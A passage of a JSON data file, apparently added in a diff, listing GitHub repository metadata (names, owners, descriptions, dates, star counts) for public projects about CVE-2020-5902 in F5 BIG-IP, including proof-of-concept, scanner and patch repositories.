"https:\/\/github.com\/ar0dd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ar0dd\/CVE-2020-5902", + "description": "POC code for checking for this vulnerability. Since the code has been released, I decided to release this one as well. Patch Immediately!", + "fork": false, + "created_at": "2020-07-05T16:38:36Z", + "updated_at": "2024-08-12T20:03:24Z", + "pushed_at": "2020-07-05T16:44:03Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277346592, + "name": "CVE-2020-5902", + "full_name": "yassineaboukir\/CVE-2020-5902", + "owner": { + "login": "yassineaboukir", + "id": 9937267, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9937267?v=4", + "html_url": "https:\/\/github.com\/yassineaboukir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yassineaboukir\/CVE-2020-5902", + "description": "Proof of concept for CVE-2020-5902", + "fork": false, + "created_at": "2020-07-05T17:01:27Z", + "updated_at": "2024-08-12T20:03:24Z", + "pushed_at": "2020-07-06T17:47:17Z", + "stargazers_count": 72, + "watchers_count": 72, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 72, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 277354676, + "name": "CVE-2020-5902-NSE", + "full_name": "rwincey\/CVE-2020-5902-NSE", + "owner": { + "login": "rwincey", + "id": 5438659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5438659?v=4", + "html_url": "https:\/\/github.com\/rwincey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rwincey\/CVE-2020-5902-NSE", + "description": null, + "fork": false, + "created_at": "2020-07-05T17:51:38Z", + "updated_at": "2021-09-30T13:33:15Z", + "pushed_at": "2020-07-06T17:10:45Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277360749, + "name": "CVE-2020-5902", + "full_name": "un4gi\/CVE-2020-5902", + "owner": { + "login": "un4gi", + "id": 47873286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47873286?v=4", + "html_url": "https:\/\/github.com\/un4gi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/un4gi\/CVE-2020-5902", + "description": "Proof of Concept for CVE-2020-5902", + "fork": false, + "created_at": "2020-07-05T18:29:37Z", + "updated_at": "2024-08-12T20:03:24Z", + "pushed_at": "2020-07-08T21:44:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277376523, + "name": "CVE-2020-5902", + "full_name": "nsflabs\/CVE-2020-5902", + "owner": { + "login": "nsflabs", + "id": 64648766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64648766?v=4", + "html_url": "https:\/\/github.com\/nsflabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nsflabs\/CVE-2020-5902", + "description": null, + "fork": false, + "created_at": "2020-07-05T20:16:07Z", + "updated_at": "2024-11-01T02:37:55Z", + "pushed_at": "2020-07-05T20:32:18Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277412358, + "name": "CVE-2020-5902", + "full_name": "yasserjanah\/CVE-2020-5902", + "owner": { + "login": "yasserjanah", + "id": 20858378, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20858378?v=4", + "html_url": "https:\/\/github.com\/yasserjanah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yasserjanah\/CVE-2020-5902", + "description": "exploit code for F5-Big-IP (CVE-2020-5902)", + "fork": false, + "created_at": "2020-07-06T01:12:23Z", + "updated_at": "2024-08-12T20:03:25Z", + "pushed_at": "2023-05-22T23:32:39Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-5902", + "exploits", + "f5-bigip", + "hacking-tool", + "python", + "rce" + ], + "visibility": "public", + "forks": 14, + "watchers": 43, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277422712, + "name": "RCE-CVE-2020-5902", + "full_name": "JSec1337\/RCE-CVE-2020-5902", + "owner": { + "login": "JSec1337", + "id": 62246378, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62246378?v=4", + "html_url": "https:\/\/github.com\/JSec1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JSec1337\/RCE-CVE-2020-5902", + "description": "BIG-IP F5 Remote Code Execution", + "fork": false, + "created_at": "2020-07-06T02:21:18Z", + "updated_at": "2021-12-01T00:39:47Z", + "pushed_at": "2020-07-06T02:53:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277438754, + "name": "CVE-2020-5902", + "full_name": "dunderhay\/CVE-2020-5902", + "owner": { + "login": "dunderhay", + "id": 27876907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27876907?v=4", + "html_url": "https:\/\/github.com\/dunderhay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dunderhay\/CVE-2020-5902", + "description": "Python script to exploit F5 Big-IP CVE-2020-5902 ", + "fork": false, + "created_at": "2020-07-06T04:03:58Z", + "updated_at": "2024-10-21T11:23:55Z", + "pushed_at": "2024-03-19T01:21:06Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 37, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277448062, + "name": "cve-2020-5902", + "full_name": "r0ttenbeef\/cve-2020-5902", + "owner": { + "login": "r0ttenbeef", + "id": 48027449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48027449?v=4", + "html_url": "https:\/\/github.com\/r0ttenbeef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0ttenbeef\/cve-2020-5902", + "description": "cve-2020-5902 POC exploit", + "fork": false, + "created_at": "2020-07-06T05:11:37Z", + "updated_at": "2022-03-23T10:36:40Z", + "pushed_at": "2020-07-06T22:35:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277463829, + "name": "CVE-2020-5902_RCE", + "full_name": "sv3nbeast\/CVE-2020-5902_RCE", + "owner": { + "login": "sv3nbeast", + "id": 55974091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55974091?v=4", + "html_url": "https:\/\/github.com\/sv3nbeast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sv3nbeast\/CVE-2020-5902_RCE", + "description": null, + "fork": false, + "created_at": "2020-07-06T06:45:21Z", + "updated_at": "2020-07-08T03:03:42Z", + "pushed_at": "2020-07-06T09:18:11Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277466351, + "name": "scanner-CVE-2020-5902", + "full_name": "cybersecurityworks553\/scanner-CVE-2020-5902", + "owner": { + "login": "cybersecurityworks553", + "id": 63910792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63910792?v=4", + "html_url": "https:\/\/github.com\/cybersecurityworks553", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cybersecurityworks553\/scanner-CVE-2020-5902", + "description": "CVE-2020-5902 scanner", + "fork": false, + "created_at": "2020-07-06T06:58:29Z", + "updated_at": "2021-10-06T13:26:18Z", + "pushed_at": "2020-07-06T07:16:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277496316, + "name": "CVE-2020-5902-POC-EXP", + "full_name": "lijiaxing1997\/CVE-2020-5902-POC-EXP", + "owner": { + "login": "lijiaxing1997", + "id": 34918652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34918652?v=4", + "html_url": "https:\/\/github.com\/lijiaxing1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lijiaxing1997\/CVE-2020-5902-POC-EXP", + "description": "批量扫描CVE-2020-5902,远程代码执行,已测试", + "fork": false, + "created_at": "2020-07-06T09:16:36Z", + "updated_at": "2024-08-12T20:03:26Z", + "pushed_at": "2020-07-09T09:24:55Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277513237, + "name": "poc-CVE-2020-5902", + "full_name": "qlkwej\/poc-CVE-2020-5902", + "owner": { + "login": "qlkwej", + "id": 25258929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25258929?v=4", + "html_url": "https:\/\/github.com\/qlkwej", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qlkwej\/poc-CVE-2020-5902", + "description": "dummy poc", + "fork": false, + "created_at": "2020-07-06T10:36:07Z", + "updated_at": "2020-07-07T02:31:59Z", + "pushed_at": "2020-07-06T10:41:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277549906, + "name": "F5-BIG-IP-CVE-2020-5902", + "full_name": "Zinkuth\/F5-BIG-IP-CVE-2020-5902", + "owner": { + "login": "Zinkuth", + "id": 36253549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36253549?v=4", + "html_url": "https:\/\/github.com\/Zinkuth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zinkuth\/F5-BIG-IP-CVE-2020-5902", + "description": null, + "fork": false, + "created_at": "2020-07-06T13:30:44Z", + "updated_at": "2020-07-06T13:47:41Z", + "pushed_at": "2020-07-06T13:40:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277567865, + "name": "CVE-2020-5902", + "full_name": "0xAbdullah\/CVE-2020-5902", + "owner": { + "login": "0xAbdullah", + "id": 29471278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29471278?v=4", + "html_url": "https:\/\/github.com\/0xAbdullah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAbdullah\/CVE-2020-5902", + "description": "Python script to check CVE-2020-5902 (F5 BIG-IP devices).", + "fork": false, + "created_at": "2020-07-06T14:41:29Z", + "updated_at": "2020-07-07T12:48:34Z", + "pushed_at": "2020-07-07T12:48:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277584668, + "name": "CVE-2020-5902", + "full_name": "jinnywc\/CVE-2020-5902", + "owner": { + "login": "jinnywc", + "id": 30540295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30540295?v=4", + "html_url": "https:\/\/github.com\/jinnywc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jinnywc\/CVE-2020-5902", + "description": "CVE-2020-5902", + "fork": false, + "created_at": "2020-07-06T15:49:46Z", + "updated_at": "2020-07-06T15:55:37Z", + "pushed_at": "2020-07-06T15:53:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277626606, + "name": "F5-Patch", + "full_name": "GoodiesHQ\/F5-Patch", + "owner": { + "login": "GoodiesHQ", + "id": 4576046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4576046?v=4", + "html_url": "https:\/\/github.com\/GoodiesHQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GoodiesHQ\/F5-Patch", + "description": "Patch F5 appliance CVE-2020-5902", + "fork": false, + "created_at": "2020-07-06T19:07:33Z", + "updated_at": "2020-07-06T19:07:34Z", + "pushed_at": "2020-07-06T19:07:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 277692329, + "name": "CVE-2020-5902", + "full_name": "jiansiting\/CVE-2020-5902", + "owner": { + "login": "jiansiting", + "id": 28823754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28823754?v=4", + "html_url": "https:\/\/github.com\/jiansiting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiansiting\/CVE-2020-5902", + "description": "F5 BIG-IP Scanner (CVE-2020-5902)", + "fork": false, + "created_at": "2020-07-07T02:03:39Z", + "updated_at": "2024-08-12T20:03:27Z", + "pushed_at": "2020-07-07T02:03:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277704969, + "name": "CVE-2020-5902-fix", + "full_name": "wdlid\/CVE-2020-5902-fix", + "owner": { + "login": "wdlid", + "id": 12636756, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12636756?v=4", + "html_url": "https:\/\/github.com\/wdlid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wdlid\/CVE-2020-5902-fix", + "description": "Fix CVE-2020-5902", + "fork": false, + "created_at": "2020-07-07T03:16:02Z", + "updated_at": "2020-07-07T13:20:47Z", + "pushed_at": "2020-07-07T03:18:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 277725875, + "name": "CVE-2020-5902-F5BIG", + "full_name": "Any3ite\/CVE-2020-5902-F5BIG", + "owner": { + "login": "Any3ite", + "id": 20638313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20638313?v=4", + "html_url": "https:\/\/github.com\/Any3ite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Any3ite\/CVE-2020-5902-F5BIG", + "description": null, + "fork": false, + "created_at": "2020-07-07T05:32:46Z", + "updated_at": "2020-07-07T05:54:24Z", + "pushed_at": "2020-07-07T05:54:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277798487, + "name": "CVE-2020-5902", + "full_name": "k3nundrum\/CVE-2020-5902", + "owner": { + "login": "k3nundrum", + "id": 47409600, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47409600?v=4", + "html_url": "https:\/\/github.com\/k3nundrum", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3nundrum\/CVE-2020-5902", + "description": null, + "fork": false, + "created_at": "2020-07-07T11:31:31Z", + "updated_at": "2020-07-08T13:06:25Z", + "pushed_at": "2020-07-08T13:06:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277800636, + "name": "CVE-2020-5902-F5-BIGIP", + "full_name": "inho28\/CVE-2020-5902-F5-BIGIP", + "owner": { + "login": "inho28", + "id": 57725357, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57725357?v=4", + "html_url": "https:\/\/github.com\/inho28", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/inho28\/CVE-2020-5902-F5-BIGIP", + "description": "Scan from a given list for F5 BIG-IP and check for CVE-2020-5902", + "fork": false, + "created_at": "2020-07-07T11:42:34Z", + "updated_at": "2020-07-07T12:00:28Z", + "pushed_at": "2020-07-07T12:00:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277851560, + "name": "f5_scanner", + "full_name": "cristiano-corrado\/f5_scanner", + "owner": { + "login": "cristiano-corrado", + "id": 3243602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3243602?v=4", + "html_url": "https:\/\/github.com\/cristiano-corrado", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cristiano-corrado\/f5_scanner", + "description": "F5 mass scanner and CVE-2020-5902 checker", + "fork": false, + "created_at": "2020-07-07T15:17:13Z", + "updated_at": "2024-03-22T14:32:41Z", + "pushed_at": "2024-06-17T23:33:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277900768, + "name": "CVE-2020-5902", + "full_name": "ajdumanhug\/CVE-2020-5902", + "owner": { + "login": "ajdumanhug", + "id": 9420289, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9420289?v=4", + "html_url": "https:\/\/github.com\/ajdumanhug", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ajdumanhug\/CVE-2020-5902", + "description": "POC", + "fork": false, + "created_at": "2020-07-07T19:07:55Z", + "updated_at": "2020-07-09T04:38:49Z", + "pushed_at": "2020-07-09T04:38:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277985626, + "name": "CVE-2020-5902", + "full_name": "zhzyker\/CVE-2020-5902", + "owner": { + "login": "zhzyker", + "id": 32918050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918050?v=4", + "html_url": "https:\/\/github.com\/zhzyker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhzyker\/CVE-2020-5902", + "description": "F5 BIG-IP 任意文件读取+远程命令执行RCE", + "fork": false, + "created_at": "2020-07-08T04:02:07Z", + "updated_at": "2024-08-12T20:03:29Z", + "pushed_at": "2020-07-08T04:10:12Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 278061523, + "name": "EvilRip", + "full_name": "GovindPalakkal\/EvilRip", + "owner": { + "login": "GovindPalakkal", + "id": 62349500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62349500?v=4", + "html_url": "https:\/\/github.com\/GovindPalakkal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GovindPalakkal\/EvilRip", + "description": "It is a small script to fetch out the subdomains\/ip vulnerable to CVE-2020-5902 written in bash", + "fork": false, + "created_at": "2020-07-08T10:38:35Z", + "updated_at": "2020-07-13T08:20:12Z", + "pushed_at": "2020-07-11T06:13:34Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 278139122, + "name": "CVE-2020-5902", + "full_name": "dnerzker\/CVE-2020-5902", + "owner": { + "login": "dnerzker", + "id": 39024823, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39024823?v=4", + "html_url": "https:\/\/github.com\/dnerzker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dnerzker\/CVE-2020-5902", + "description": null, + "fork": false, + "created_at": "2020-07-08T16:22:53Z", + "updated_at": "2020-07-16T16:16:40Z", + "pushed_at": "2020-07-16T16:16:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 278201438, + "name": "checkvulnCVE20205902", + "full_name": "renanhsilva\/checkvulnCVE20205902", + "owner": { + "login": "renanhsilva", + "id": 29900840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29900840?v=4", + "html_url": "https:\/\/github.com\/renanhsilva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/renanhsilva\/checkvulnCVE20205902", + "description": "A powershell script to check vulnerability CVE-2020-5902 of ip list", + "fork": false, + "created_at": "2020-07-08T21:50:32Z", + "updated_at": "2021-04-04T00:01:08Z", + "pushed_at": "2020-07-08T21:56:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 278202552, + "name": "f5scan", + "full_name": "halencarjunior\/f5scan", + "owner": { + "login": "halencarjunior", + "id": 403088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/403088?v=4", + "html_url": "https:\/\/github.com\/halencarjunior", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/halencarjunior\/f5scan", + "description": "F5 BIG IP Scanner for CVE-2020-5902", + "fork": false, + "created_at": "2020-07-08T21:57:37Z", + "updated_at": "2022-06-24T19:09:06Z", + "pushed_at": "2020-08-13T14:07:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "infosec", + "scanner", + "vulnerabilities" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 278278361, + "name": "GoF5-CVE-2020-5902", + "full_name": "deepsecurity-pe\/GoF5-CVE-2020-5902", + "owner": { + "login": "deepsecurity-pe", + "id": 55849696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55849696?v=4", + "html_url": "https:\/\/github.com\/deepsecurity-pe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/deepsecurity-pe\/GoF5-CVE-2020-5902", + "description": "Script para validar CVE-2020-5902 hecho en Go.", + "fork": false, + "created_at": "2020-07-09T06:09:39Z", + "updated_at": "2024-08-12T20:03:31Z", + "pushed_at": "2020-07-09T06:37:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 278297746, + "name": "CVE-2020-5902-fofa-scan", + "full_name": "Shu1L\/CVE-2020-5902-fofa-scan", + "owner": { + "login": "Shu1L", + "id": 61683660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61683660?v=4", + "html_url": "https:\/\/github.com\/Shu1L", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shu1L\/CVE-2020-5902-fofa-scan", + "description": null, + "fork": false, + "created_at": "2020-07-09T07:44:07Z", + "updated_at": "2021-05-21T13:50:04Z", + "pushed_at": "2020-07-09T08:06:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 278308798, + "name": "F5-Big-IP-CVE-2020-5902-mass-exploiter", + "full_name": "d4rk007\/F5-Big-IP-CVE-2020-5902-mass-exploiter", + "owner": { + "login": "d4rk007", + "id": 44454186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44454186?v=4", + "html_url": "https:\/\/github.com\/d4rk007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4rk007\/F5-Big-IP-CVE-2020-5902-mass-exploiter", + "description": "F5 Big-IP CVE-2020-5902 mass exploiter\/fuzzer.", + "fork": false, + "created_at": "2020-07-09T08:34:37Z", + "updated_at": "2024-08-12T20:03:31Z", + "pushed_at": "2020-07-11T14:10:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 278380388, + "name": "CVE-2020-5902-Vuln-Checker", + "full_name": "TheCyberViking\/CVE-2020-5902-Vuln-Checker", + "owner": { + "login": "TheCyberViking", + "id": 22121899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22121899?v=4", + "html_url": "https:\/\/github.com\/TheCyberViking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCyberViking\/CVE-2020-5902-Vuln-Checker", + "description": "Simple Vulnerability Checker Wrote by me \"@TheCyberViking\" and A fellow Researcher who wanted to be left Nameless... you know who you are you beautiful bitch", + "fork": false, + "created_at": "2020-07-09T14:01:29Z", + "updated_at": "2020-07-26T14:48:39Z", + "pushed_at": "2020-07-26T14:48:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 278562778, + "name": "checker-CVE-2020-5902", + "full_name": "MrCl0wnLab\/checker-CVE-2020-5902", + "owner": { + "login": "MrCl0wnLab", + "id": 17049332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17049332?v=4", + "html_url": "https:\/\/github.com\/MrCl0wnLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrCl0wnLab\/checker-CVE-2020-5902", + "description": "Checker CVE-2020-5902: BIG-IP versions 15.0.0 through 15.1.0.3, 14.1.0 through 14.1.2.5, 13.1.0 through 13.1.3.3, 12.1.0 through 12.1.5.1, and 11.6.1 through 11.6.5.1 suffer from Traffic Management User Interface (TMUI) arbitrary file read and command execution vulnerabilities.", + "fork": false, + "created_at": "2020-07-10T07:00:35Z", + "updated_at": "2024-08-12T20:03:33Z", + "pushed_at": "2020-07-10T15:31:07Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 278572697, + "name": "CVE-2020-5902-POC", + "full_name": "qiong-qi\/CVE-2020-5902-POC", + "owner": { + "login": "qiong-qi", + "id": 67992753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67992753?v=4", + "html_url": "https:\/\/github.com\/qiong-qi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qiong-qi\/CVE-2020-5902-POC", + "description": "批量检测CVE-2020-5902", + "fork": false, + "created_at": "2020-07-10T07:49:23Z", + "updated_at": "2020-07-10T07:54:22Z", + 